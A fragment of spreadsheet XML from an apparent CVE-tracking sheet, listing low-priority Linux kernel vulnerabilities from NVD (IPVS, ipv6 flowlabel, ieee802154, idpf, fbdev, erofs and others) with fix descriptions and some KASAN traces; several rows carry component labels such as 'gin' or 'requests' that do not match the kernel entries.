        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr"/>
      <c r="S528" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipvs: reject invalid states in connection template sync records
IPVS sync receivers validate protocol states before creating or updating a
connection. For connection templates, however, they only log states outside
the template state range and still store the value in the connection.
A template can be returned by ordinary connection lookup. TCP and SCTP then
use the invalid state as an index into their transition tables.
Reject invalid template states in both sync protocol versions before
looking up or modifying a connection. The version 1 path handles both
IPv4 and IPv6 records.</t>
        </is>
      </c>
      <c r="T528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97596</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97597</t>
        </is>
      </c>
      <c r="D529" s="5" t="inlineStr"/>
      <c r="E529" s="5" t="inlineStr"/>
      <c r="F529" s="5" t="inlineStr"/>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr"/>
      <c r="S529" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: flowlabel: cap duplicate leases per socket
ipv6_flowlabel_get() allocates an ipv6_fl_socklist entry for every
successful GET. The recheck path for a compatible existing flowlabel
links another lease without applying any lease admission check. Repeated
GET requests for one shareable label can therefore grow a socket's lease
list without bound.
Reject a new unprivileged lease once the socket already holds
FL_MAX_PER_SOCK leases. Check this on the shared recheck path so reuse
of a globally interned label, including the fl_intern() collision path,
is covered as well. New-label admission remains under the existing
mem_check() policy.
Use capable(CAP_NET_ADMIN) rather than ns_capable(), matching
mem_check(). An unprivileged user must not bypass the cap by creating a
user namespace and a netns where they have CAP_NET_ADMIN, which would
still consume host memory.
Check the capability only when the socket reaches the limit, so
successful unprivileged GET requests below the cap do not generate a
capability audit. Do the admission check before updating linger and
expires so a rejected GET does not refresh the shared label, matching
the existing socket-list allocation failure path.</t>
        </is>
      </c>
      <c r="T529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97597</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97598</t>
        </is>
      </c>
      <c r="D530" s="5" t="inlineStr"/>
      <c r="E530" s="5" t="inlineStr"/>
      <c r="F530" s="5" t="inlineStr"/>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr"/>
      <c r="S530" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv4: fib: bound automatic table ID allocation
fib_empty_table() probes every table ID from 1 until it finds a
free one.  IPv4 tables are stored in a 256-bucket hash table, so a
dense set of IDs makes each probe walk a growing hash chain while
RTNL is held.
Automatic table assignment ("ip rule ... table 0") is an IPv4-only
legacy path.  Bound the automatically allocated ID to 4096 so the
RTNL hold stays bounded, without changing lookups of explicitly
specified table IDs.
This changes user-visible behavior.  A table-0 rule previously
received the lowest free ID in 1..RT_TABLE_MAX (0xFFFFFFFF).  After
this patch the search stops at 4096 and the rule add fails with
ENOBUFS if that range is fully occupied.  Explicit table IDs above
4096 remain usable.
The automatic path is unused in practice: it is IPv4-only, not
documented by ip-rule, uncovered by kernel selftests, and both
NetworkManager and systemd refuse table 0.</t>
        </is>
      </c>
      <c r="T530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97598</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97599</t>
        </is>
      </c>
      <c r="D531" s="5" t="inlineStr"/>
      <c r="E531" s="5" t="inlineStr"/>
      <c r="F531" s="5" t="inlineStr"/>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr"/>
      <c r="S531" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ieee802154: hwsim: serialize pib updates to fix double-free
hwsim_update_pib() does an unserialized read-swap-free of phy-&gt;pib:
	pib_old = rtnl_dereference(phy-&gt;pib);
	...
	rcu_assign_pointer(phy-&gt;pib, pib);
	kfree_rcu(pib_old, rcu);
It assumes the RTNL is held, but -&gt;set_channel is not always called
under it: the mac802154 scan worker changes channels via
drv_set_channel() without the RTNL. Such an update can race an
RTNL-held one on the same phy; both read the same pib_old and both
kfree_rcu() it, double-freeing the object. With SLUB percpu sheaves
batching kfree_rcu(), this surfaces as a KASAN invalid-free in
rcu_free_sheaf().
struct hwsim_phy has no lock for pib. Add one and make the swap atomic
with rcu_replace_pointer() under it, dropping the misleading
rtnl_dereference().</t>
        </is>
      </c>
      <c r="T531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97599</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97600</t>
        </is>
      </c>
      <c r="D532" s="5" t="inlineStr"/>
      <c r="E532" s="5" t="inlineStr"/>
      <c r="F532" s="5" t="inlineStr"/>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr"/>
      <c r="S532" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ieee802154: cc2520: fix FIFOP work use-after-free
The FIFOP interrupt handler queues cc2520_fifop_irqwork.  On removal,
cc2520_remove() only flushes the work.  The devm-managed FIFOP IRQ
remains active until after -&gt;remove() returns and can queue the work
again after that flush, allowing it to run after the private data is
released.
Disable the work with disable_work_sync() instead of flushing it, so
the handler can no longer queue it once removal begins.  Destroy the
buffer mutex last, since the worker and the stop callback invoked
through ieee802154_unregister_hw() both take it.
Found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97600</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97601</t>
        </is>
      </c>
      <c r="D533" s="5" t="inlineStr"/>
      <c r="E533" s="5" t="inlineStr"/>
      <c r="F533" s="5" t="inlineStr"/>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr"/>
      <c r="S533" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ieee802154: 6lowpan: fix NULL dereference in lowpan_newlink
TUNSETLINK allows a TUN device to change its link-layer type to
ARPHRD_IEEE802154 without initializing ieee802154_ptr. lowpan_newlink()
checks only the device type before dereferencing the pointer, so an
RTM_NEWLINK request can trigger a NULL pointer dereference.
Reject devices without ieee802154_ptr along with devices of the wrong type.</t>
        </is>
      </c>
      <c r="T533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97601</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97603</t>
        </is>
      </c>
      <c r="D534" s="5" t="inlineStr"/>
      <c r="E534" s="5" t="inlineStr"/>
      <c r="F534" s="5" t="inlineStr"/>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr"/>
      <c r="S534" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
idpf: disable DIM work before freeing q_vectors
idpf never drains the Tx/Rx DIM works before freeing the memory they
live in.  tx_dim and rx_dim are embedded in struct idpf_q_vector, they
are queued from the NAPI poll via net_dim(), and idpf_vport_intr_rel()
ends with kfree(rsrc-&gt;q_vectors).  Nothing in the driver cancels them.
idpf_tx_dim_work() and idpf_rx_dim_work() then run on freed memory:
idpf_vport_intr_write_itr() writes the ITR register through
q_vector-&gt;intr_reg.tx_itr / rx_itr, void __iomem pointers loaded out of
the freed q_vector.  No configuration is needed to get there --
IDPF_ITR_IS_DYNAMIC() is defined as (itr_mode) and idpf_vport_alloc()
initialises both modes to IDPF_ITR_DYNAMIC.
Draining after idpf_vport_intr_napi_dis_all() is not enough on its own.
idpf_net_dim() is called from inside the
"if (napi_complete_done(napi, work_done))" branch of the poll, and
napi_complete_done() has already cleared NAPIF_STATE_SCHED by then.
napi_disable_locked() waits only while (val &amp; (NAPIF_STATE_SCHED |
NAPIF_STATE_NPSVC)), so napi_disable() can return while the poll tail is
still queueing the work, and a plain cancel_work_sync() would be
re-armed behind the drain.
Use disable_work_sync(): schedule_work() on a work with a non-zero
disable count is dropped by clear_pending_if_disabled() before
__queue_work() is reached.
Move idpf_init_dim() to idpf_vport_intr_alloc() so the works are
initialised on every path that can reach the drain -- the three
"goto intr_deinit" sites between idpf_vport_intr_init() and
idpf_vport_intr_ena() get there without the enable side having run.
Nothing re-enables them: rsrc-&gt;q_vectors is freed on every exit from
idpf_vport_open() and on every idpf_vport_stop(), so the count dies with
the object.
It is a race, not a deterministic failure -- net_dim() only schedules
once DIM_NEVENTS events have accumulated and the profile index changes.
A KASAN ifup/ifdown loop under load is the way to see it.</t>
        </is>
      </c>
      <c r="T534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97603</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97604</t>
        </is>
      </c>
      <c r="D535" s="5" t="inlineStr"/>
      <c r="E535" s="5" t="inlineStr"/>
      <c r="F535" s="5" t="inlineStr"/>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr"/>
      <c r="S535" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fbdev: vfb: defer cleanup until the last reference
FBIOGETCMAP takes a shallow snapshot of info-&gt;cmap and performs the
usercopy after dropping info-&gt;lock. vfb_remove() frees the colormap
immediately after unregistering the framebuffer, even when an open file
still holds a reference to fb_info. A concurrent driver unbind can
therefore free the colormap while the ioctl copies it to userspace.
KASAN reports:
  BUG: KASAN: slab-use-after-free in _copy_to_user
  Read of size 512 by task poc/125
   _copy_to_user (./include/linux/instrumented.h:129 ./include/linux/uaccess.h:201 lib/usercopy.c:24)
   fb_cmap_to_user (./include/linux/uaccess.h:230 drivers/video/fbdev/core/fbcmap.c:211)
   do_fb_ioctl (drivers/video/fbdev/core/fb_chrdev.c:114)
   Allocated by task 1:
   fb_alloc_cmap_gfp (./include/linux/slab.h:973 ./include/linux/slab.h:1290 drivers/video/fbdev/core/fbcmap.c:108)
   vfb_probe (drivers/video/fbdev/vfb.c:459)
   Freed by task 124:
   fb_dealloc_cmap (drivers/video/fbdev/core/fbcmap.c:151)
   vfb_remove (drivers/video/fbdev/vfb.c:489)
unregister_framebuffer() drops the registration reference, and fbdev calls
fb_destroy after the last put_fb_info(). Move the registered framebuffer's
cleanup into an fb_destroy callback so its colormap and screen buffer stay
alive until all file references have been released.</t>
        </is>
      </c>
      <c r="T535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97604</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97605</t>
        </is>
      </c>
      <c r="D536" s="5" t="inlineStr"/>
      <c r="E536" s="5" t="inlineStr"/>
      <c r="F536" s="5" t="inlineStr"/>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr"/>
      <c r="S536" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: preserve LZMA decoders on resize failure
The pool-resize path frees each stream's old decoder before allocating
its replacement. If an allocation fails after some streams have already
been replaced, the failed stream is put back on the list with state ==
NULL. z_erofs_lzma_max_dictsize is still advanced as if the whole
pool had been resized.
An existing LZMA mount can select the broken stream and pass
NULL to xz_dec_microlzma_reset(). A retry at the same size also
skip another resize attempt. Since the global maximum was advanced,
thus, the invalid state is left unrepaired.
Allocate each replacement before freeing the old decoder, temporarily
retaining one old decoder during allocation. Stop at the first failure
and advance z_erofs_lzma_max_dictsize only after all streams satisfy
the request.
Record each stream's dictionary capacity so retries can skip streams
already enlarged before a partial failure.</t>
        </is>
      </c>
      <c r="T536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97605</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97606</t>
        </is>
      </c>
      <c r="D537" s="5" t="inlineStr"/>
      <c r="E537" s="5" t="inlineStr"/>
      <c r="F537" s="5" t="inlineStr"/>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="inlineStr"/>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr"/>
      <c r="S537" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs: autofs: fix memory leak in autofs_fill_super()
In autofs_fill_super(), we create a new inode using
autofs_new_ino(), however, if we fail to create root_inode,
(that is, root_inode failure path), we return -ENOMEM without
freeing the new inode(ino) that we created causing a memory leak.
Fix this by adding autofs_free_ino() to free the inode we created
in root_inode failure path before returning ENOMEM.</t>
        </is>
      </c>
      <c r="T537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97606</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97607</t>
        </is>
      </c>
      <c r="D538" s="5" t="inlineStr"/>
      <c r="E538" s="5" t="inlineStr"/>
      <c r="F538" s="5" t="inlineStr"/>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="inlineStr"/>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr"/>
      <c r="S538" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa: ifcvf: Put device on unsupported feature error
Route unsupported provisioned features through the common error path after
vdpa_alloc_device() so the allocated device and adapter pointer are
released consistently.</t>
        </is>
      </c>
      <c r="T538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97607</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97610</t>
        </is>
      </c>
      <c r="D539" s="5" t="inlineStr"/>
      <c r="E539" s="5" t="inlineStr"/>
      <c r="F539" s="5" t="inlineStr"/>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="inlineStr"/>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr"/>
      <c r="S539" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfs: Fix uninitialized return value in netfs_unbuffered_write()
If preparation of the first subrequest fails,
netfs_unbuffered_write() exits its loop before ret is initialized. The
empty-iterator check can do the same.
For synchronous writes, netfs_unbuffered_write_iter_locked() may then
return an unrelated error instead of wreq-&gt;error. This is reachable
through CIFS if cifs_prepare_write() fails to reopen the file or obtain
credits.
Initialize ret to 0 so the caller returns wreq-&gt;error if no data was
written, or the number of bytes already written otherwise.
Found with Clang's -Wconditional-uninitialized.</t>
        </is>
      </c>
      <c r="T539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97610</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97613</t>
        </is>
      </c>
      <c r="D540" s="5" t="inlineStr"/>
      <c r="E540" s="5" t="inlineStr"/>
      <c r="F540" s="5" t="inlineStr"/>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr"/>
      <c r="S540" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mana: Reserve extra CQ slot for the fence completion CQE
The RX completion queue is sized to hold exactly one CQE per posted RX WQE.
MANA_FENCE_RQ makes hardware post an additional CQE_RX_OBJECT_FENCE after
the packet CQEs. The current sizing reserves no extra slot for it and in
rare cases, CQ has no guaranteed slot for the fence CQE when it is full of
packet CQEs. This can lead to dropping the fence completion while the
driver waits holding RTNL lock throughout the timeout duration.
Reserve one extra CQE slot for CQE_RX_OBJECT_FENCE. mana_gd_alloc_memory()
requires queue_size to be a power-of-two and at least MANA_PAGE_SIZE;
the reservation pushes cq_size past a power-of-two, so round up the CQ size
in mana_create_rxq().</t>
        </is>
      </c>
      <c r="T540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97613</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97614</t>
        </is>
      </c>
      <c r="D541" s="5" t="inlineStr"/>
      <c r="E541" s="5" t="inlineStr"/>
      <c r="F541" s="5" t="inlineStr"/>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="inlineStr"/>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q541" s="5" t="inlineStr"/>
      <c r="R541" s="5" t="inlineStr"/>
      <c r="S541" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: dsa: tag_brcm: legacy FCS: request needed tailroom
The legacy FCS tagger calculates the CRC over skb-&gt;len bytes starting at
skb-&gt;data. When a nonlinear skb reaches the tagger, this reads past the
linear head into unrelated slab memory.
The tagger appends an Ethernet FCS but does not declare that tailroom. As a
result, DSA leaves NETIF_F_SG and NETIF_F_FRAGLIST enabled on the user
port, and nonlinear skbs can reach the CRC calculation.
Declare the required tailroom. DSA will then clear those features and the
networking core will linearize skbs before the tagger runs.
A KASAN-enabled dsa_loop test using this tagger reports:
  BUG: KASAN: slab-out-of-bounds in crc32_le
  Read of size 1 at addr ffff8880397086c0 by task exp/135
  Call Trace:
   crc32_le (lib/crc/crc32-main.c:38)
   brcm_leg_fcs_tag_xmit (net/dsa/tag_brcm.c:343)
   dsa_user_xmit (net/dsa/user.c:942)
   dev_hard_start_xmit (net/core/dev.c:3937)
   __dev_queue_xmit (net/core/dev.c:4926)
   packet_sendmsg (net/packet/af_packet.c:3110)
   __sys_sendto (net/socket.c:2281)
  The buggy address belongs to the object at ffff888039708400
   which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 0 bytes to the right of
   allocated 704-byte region [ffff888039708400, ffff8880397086c0)</t>
        </is>
      </c>
      <c r="T541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97614</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97615</t>
        </is>
      </c>
      <c r="D542" s="5" t="inlineStr"/>
      <c r="E542" s="5" t="inlineStr"/>
      <c r="F542" s="5" t="inlineStr"/>
